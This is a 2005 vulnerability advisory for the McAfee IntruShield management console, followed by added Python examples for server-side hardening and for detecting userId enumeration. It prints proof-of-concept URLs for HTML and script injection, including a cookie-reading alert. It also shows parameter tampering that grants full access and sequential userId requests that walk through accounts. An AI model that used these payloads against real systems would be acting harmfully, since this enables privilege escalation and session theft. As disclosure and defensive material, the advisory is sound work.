$ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
$ This advisory and/or proof of concept code must not be used for commercial gain.
McAfee IntruShield Security Management System http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm
"The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor appliances. By integrating a comprehensive set of Best-in-Class security management functions, the IntruShield Security Management System dramatically simplifies and streamlines the complexities associated with IPS configuration, policy compliance, and threat and response management."
A new version has been released to address these bugs and can be downloaded from their site.
Note: for issues 1 - 4, the attacker needs a valid user account.
1) It is possible to embed HTML into the MISMS. This could potentially allow phishing attacks to be performed against a valid Manager account.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600></iframe>&severity=critical&count=1
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)
3) It is possible to access the restricted "Generate Reports" section of the MISMS, so a non-privileged user can obtain important information about the configuration and set-up of the IP devices managed by the service. This is achieved simply by changing the Access option from false to true.
4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying the URLs sent to the system, again simply by changing the Access option from false to true.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
Each change is emailed to the administrator; however, the email only says that "someone" made a change, so the notification does not identify the account that made it.
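Issues 1 to 4 share one root cause: the privilege decision (fullAccess) is taken from the URL, and user-supplied parameters such as thirdMenuName and resourceName are echoed into the page unescaped. The following Python sketch is an added example of the server-side handling that would close both holes and also produce an audit record naming the acting user (the "someone" problem above). It is not McAfee's code and not a JSP; the session store, the role names and the Decision fields are assumptions made for the illustration.

```python
import html
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed server-side session store (assumption): the role was fixed at
# login and is never read from the request.
SESSIONS = {
    "sess-admin": {"user": "admin", "role": "Manager"},
    "sess-viewer": {"user": "viewer", "role": "ReadOnly"},
}


@dataclass
class Decision:
    full_access: bool      # what the server actually grants
    tampered: bool         # request claimed fullAccess=true without the role
    rendered_menu: str     # thirdMenuName as it may be written into HTML
    audit: str             # log line naming the acting account


def handle_system_event(session_id: str, url: str) -> Decision:
    """Hardened handling of a SystemEvent.jsp-style request.

    - Authorisation is derived from the session role only; the fullAccess
      query parameter is ignored except to flag tampering attempts.
    - The echoed menu name is HTML-escaped so <iframe>/<script> payloads
      render as text instead of markup.
    """
    session = SESSIONS.get(session_id)
    if session is None:
        raise PermissionError("no valid session")

    params = parse_qs(urlsplit(url).query, keep_blank_values=True)

    role_allows = session["role"] == "Manager"
    claimed = params.get("fullAccess", ["false"])[0].lower() == "true"
    tampered = claimed and not role_allows

    menu = params.get("thirdMenuName", [""])[0]
    rendered = html.escape(menu, quote=True)

    audit = (f"user={session['user']} role={session['role']} "
             f"fullAccess_claimed={claimed} granted={role_allows}")
    return Decision(role_allows, tampered, rendered, audit)


if __name__ == "__main__":
    # Constructed request mirroring the advisory's pattern (placeholder host/path).
    url = ("https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp"
           "?fullAccess=true&thirdMenuName=<iframe src=\"http://example.invalid/\">"
           "</iframe>&severity=critical")
    d = handle_system_event("sess-viewer", url)
    print(d.audit)
    print("tampered:", d.tampered, "| rendered:", d.rendered_menu)
```

The point of the example is where the trust boundary sits: the client may send any fullAccess value it likes, but the grant comes from SESSIONS, and a mismatch is itself a signal worth logging.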
5) By default, all user ID values are passed in the URL in the clear, meaning that it is trivial for an attacker to brute force accounts until a privileged Manager account is found. An example of this would look similar to:
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif
This process can be continued until a valid user ID has been found with privileges to access the configure screen.
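Because the userId values are sequential and sit in the query string, the enumeration described in issue 5 leaves a very recognisable trace in the web server's access log: one source requesting many distinct userId values in a short time. The detection below is an added example written for this advisory, not part of it and not a McAfee feature; the log lines are constructed in common-log format with made-up addresses, and the five-minute window and threshold of three distinct IDs are assumptions to be tuned per deployment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log sample (not real traffic). 10.0.0.5 walks userId 1..5
# in five seconds; 10.0.0.9 is a normal user hitting its own id twice.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2005:10:00:01 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.5 - - [06/Jul/2005:10:00:02 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.5 - - [06/Jul/2005:10:00:03 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.5 - - [06/Jul/2005:10:00:04 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.5 - - [06/Jul/2005:10:00:05 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=5&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:05:00 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=17&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:07:00 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=17&logo=intruvert.gif HTTP/1.1" 200 512
"""

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
USERID_RE = re.compile(r"[?&]userId=(\d+)")


def parse_line(line):
    """Return (ip, timestamp, userId) for a disp.jsp-style hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uid = USERID_RE.search(m.group("path"))
    if not uid:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(uid.group(1))


def detect_userid_enumeration(log_text, window=timedelta(minutes=5), threshold=3):
    """Map source ip -> sorted distinct userIds for every source that requested
    at least `threshold` distinct userId values inside any `window`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ip, ts, uid = parsed
            events[ip].append((ts, uid))

    findings = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans at most `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = {uid for _, uid in evs[start:end + 1]}
            if len(distinct) >= threshold:
                findings[ip] = sorted(distinct)
    return findings


if __name__ == "__main__":
    for ip, ids in detect_userid_enumeration(SAMPLE_LOG).items():
        print(f"possible userId enumeration from {ip}: ids {ids}")
```

Counting distinct IDs rather than raw hits keeps a legitimate user who reloads their own page out of the alert, while still catching a slow walk across the ID space once the window is widened.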